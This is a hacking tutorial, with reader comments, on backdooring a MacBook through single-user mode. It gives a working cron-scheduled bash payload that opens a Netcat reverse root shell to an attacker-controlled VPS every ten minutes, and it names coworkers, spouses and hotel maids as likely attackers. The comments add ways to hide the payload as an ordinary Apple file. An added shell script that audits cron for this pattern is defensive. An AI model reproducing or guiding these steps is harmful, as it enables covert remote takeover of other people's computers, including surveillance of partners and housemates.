Hacking macOS: How to Connect to MacBook Backdoors from Anywhere in the World


Backdooring a powered-off MacBook is easy when a few minutes of physical access is allowed. That attack works well if the hacker also shares a Wi-Fi network with the victim, but this time, I'll show how to remotely establish a connection to the backdoored MacBook as it moves between different Wi-Fi networks.

I've already shown how to backdoor a MacBook using a simple Netcat payload. This time, instead of creating a Netcat listener on the laptop and using an incoming connection to control it, the listener is created on an attacker-controlled VPS (virtual private server), and the MacBook periodically uses outgoing transmissions to connect to it. The roles of the Netcat commands are reversed; the attacker waits for incoming connections. The macOS default firewall settings only filter incoming connections, so this will entirely evade default firewall configurations.

This kind of physical attack can be performed by coworkers, neighbors, hotel maids, roommates, friends, spouses, or anyone with a few minutes of physical access to the target MacBook.

Step 1: Purchase the VPS

There are no particular VPS configurations required in this method. A VPS with minimum specifications will perform well for this specific attack as there will not be any powerful CPU or RAM usage required.

The VPS should be online and accessible via SSH before booting the MacBook into single-user mode. Take note of the VPS's IP address, as it's required in the next step.

Step 2: Create the Netcat Payload

This method is a standalone method and does not require the Netcat payload used in my previous article.

While in single-user mode, instead of creating a listener on the MacBook, Netcat will be used to periodically connect to the attacker's server at a set interval. To do this, nano can be used to save the below BASH script into a file called payload.

nano /etc/payload

Type the below script into the nano terminal (The VPS-IP-ADDRESS-HERE should be changed to the attacker's IP address for the VPS), then save and exit by pressing Ctrl + X, then Y, then Return.

#!/bin/bash

n=$(ps aux | grep -o [1]234)

if [[ $n = "" ]]; then
    mkfifo f
    nc VPS-IP-ADDRESS-HERE 1234 < f | /bin/bash -i > f 2>&1
fi

Much like my previous BASH script, the first line (n=$(ps aux | grep -o [1]234)) creates a variable n that is non-empty only if a running process already has "1234" in its command line, which is the case when a Netcat session to port 1234 is already active. This detection is done with ps, a tool used to list running processes; the [1] bracket in the grep pattern stops grep from matching its own command line.

The following line (if [[ $n = "" ]]; then) starts an if statement: if the variable n is empty (no Netcat process for port 1234 was found), mkfifo, a tool used to create a "named pipe," will create a pipe file called f in the current working directory. The filename here is totally arbitrary and uses "f" for simplicity.

Following the mkfifo command is the Netcat command (nc VPS-IP-ADDRESS-HERE 1234 < f | /bin/bash -i > f 2>&1) which is the primary difference compared to my previous script. Instead of opening a port, it tries to connect to port 1234 on the attacker-controlled VPS. Commands are again piped using the f file to grant the attacker access to a full BASH terminal.

As said before, the VPS-IP-ADDRESS-HERE should be changed to the attacker's IP address for the VPS. For example, if the attacker's IP address were 11.22.33.44, that line of the script would appear as such:

nc 11.22.33.44 1234 < f | /bin/bash -i > f 2>&1

Step 3: Use Cron to Execute the Payload

Next, crontab, a feature of cron, will be used to schedule the BASH script ("payload") to execute every 10 minutes. The below command can be used to accomplish this.

env EDITOR=nano crontab -e

A new nano terminal will open. Type the below into nano, then save and exit the terminal.

*/10 * * * * /etc/payload

Readers interested in scheduling cronjobs at intervals other than 10 minutes should check out TecAdmin's useful article.

Step 4: Elevate the Payload File Permissions

Lastly, the payload file must be made executable using the below chmod command so that cron can run it without any user input.

chmod 777 /etc/payload

Step 5: Shut Down the MacBook

When that's done, enter the below command into the single-user terminal to shut down the laptop.

shutdown -h now

That's it for backdooring the macOS device. When the owner of the laptop turns the device on, cron will execute the payload every 10 minutes and Netcat will attempt to connect to the attacker's server. If the server is not online, the Netcat command will fail silently and try again at the next interval.

Step 6: Wait for Incoming Connections

Now, with the MacBook backdoored, the final step is to start the Netcat listener on the VPS and wait for an incoming connection. This can be done using the below Netcat command.

nc -l -p 1234

Netcat will listen (-l) for incoming connections on every available interface on port (-p) 1234. That's all there is to it.

When a new Netcat connection is established, the attacker will have full root access to the compromised MacBook. In upcoming articles, I'll show a few post-exploitation tricks such as reading private Mail messages, dumping Chrome browser data, and escalating privileges.

Readers interested in defending against such attacks should review the "How to Protect Yourself from Single-User Mode Abuse" section of my previous article.
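As an added defensive check (example code written for this edit, not part of the article), the script below audits cron for the exact persistence described above: it reads /etc/crontab and the root crontab, resolves the program each entry schedules, and flags any script that combines mkfifo, a Netcat call and an interactive shell. It assumes it is run as root on macOS; the function names, the AUDIT_LIVE switch and the sample inputs are constructed for the example.

```shell
#!/bin/sh
# Added defensive audit (not code from the article): flag cron-scheduled scripts
# that carry the mkfifo + nc + "bash -i" reverse-shell pattern shown above.
# Assumed to run as root on macOS; the live checks read /etc/crontab and `crontab -l`.

# Succeed (0) only when FILE contains all three ingredients of the pattern.
is_reverse_shell_script() {
    file="$1"
    [ -r "$file" ] || return 1
    grep -q 'mkfifo' "$file" || return 1
    grep -Eq '(^|[^[:alnum:]_])(nc|ncat|netcat)[[:space:]]' "$file" || return 1
    grep -Eq '/(ba|z)?sh[[:space:]]+-i' "$file" || return 1
}

# Read crontab text on stdin; print the program each entry schedules (first word of
# the command field). "system" expects the extra user column of /etc/crontab,
# "user" the five-field layout of `crontab -l`. Comments, blank and VAR= lines are skipped.
cron_programs() {
    if [ "$1" = system ]; then skip=6; else skip=5; fi
    grep -Ev '^[[:space:]]*(#|$|[A-Za-z_]+=)' | awk -v skip="$skip" '
        { n = ($1 ~ /^@/) ? skip - 4 : skip }   # @reboot etc. replace the five time fields
        NF > n { print $(n + 1) }'
}

# Audit one crontab from stdin: print "SUSPICIOUS <program>" per hit; return 1 if any.
audit_crontab() {
    hits=$(cron_programs "$1" | while IFS= read -r prog; do
        is_reverse_shell_script "$prog" && printf 'SUSPICIOUS %s\n' "$prog"
    done)
    [ -n "$hits" ] || return 0
    printf '%s\n' "$hits"
    return 1
}

# Live checks for an administrator; only run when AUDIT_LIVE=1 is set in the environment.
main() {
    status=0
    if [ -r /etc/crontab ]; then audit_crontab system < /etc/crontab || status=1; fi
    crontab -l 2>/dev/null | audit_crontab user || status=1
    [ "$status" -eq 0 ] && echo "no reverse-shell cron payloads found"
    return $status
}
[ "${AUDIT_LIVE:-0}" = 1 ] && main
```

Other users' crontabs can be checked the same way with `crontab -u NAME -l | audit_crontab user`; a hit should be treated as a sign of the single-user-mode tampering described above, not just cleaned up.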


Cover image by Nilotpal Kalita/Unsplash; Screenshots by tokyoneon/Null Byte

3 Comments

Some improvements:

To hide the suspicious "f" file, just type:
mkfifo .f
nc VPS-IP-ADDRESS-HERE 1234 < .f | /bin/bash -i > .f 2>&1

To execute the cronjob if your target logs in with other accounts (else { it only works if the target logs in with the root user };) type:

"nano /etc/crontab" instead of "env EDITOR=nano crontab -e"
And add the following line at the bottom:
"?/10 ? ? ? ? root /etc/payload"

Please change the question marks in stars... unexpectedly they moved into points in this comment section...

ALPHA PREDATOR

Hey Alpha,

Yup, adding a dot before the filename will make the "f" file hidden. But if you're trying to keep the file from being located, it might be better to hide it in plain sight. For example, put it in the ~/Library directory with a filename like "com.apple.plist" to make it appear as an ordinary Apple file.

it only works if the target log in with the root user

This isn't true. Adding "root" before the payload path isn't required. When the user logs into their (non-root) account, a root shell will be established. This is because the cronjob is running as root already. When you enter single-user mode to embed the cron, it's done using a root shell.

For example, put it in the ~/Library directory with a filename like "com.apple.plist" to make it appear as an ordinary Apple file.

This is a very good idea! I think if anyone googles com.apple.plist he can't find any "WARNING DANGEROUS! ITS A FILE WHICH IS USED BY AN EXPLOIT!!!" logs or anything else, and in the ~/Library/ folder there are sooo many com.apple/anythingelse.plist files!!

This isn't true. Adding "root" before the payload path isn't required. When the user logs into their (non-root) account, a root shell will be established. This is because the cronjob is running as root already. When you enter single-user mode to embed the cron, it's done using a root shell.

I don't know why, but for some reason it didn't work with the "crontab -e" as root. In my case, it worked only directly after backdooring, but not after rebooting 2 times.

Maybe it's because I'm using an older Mac...?

ALPHA
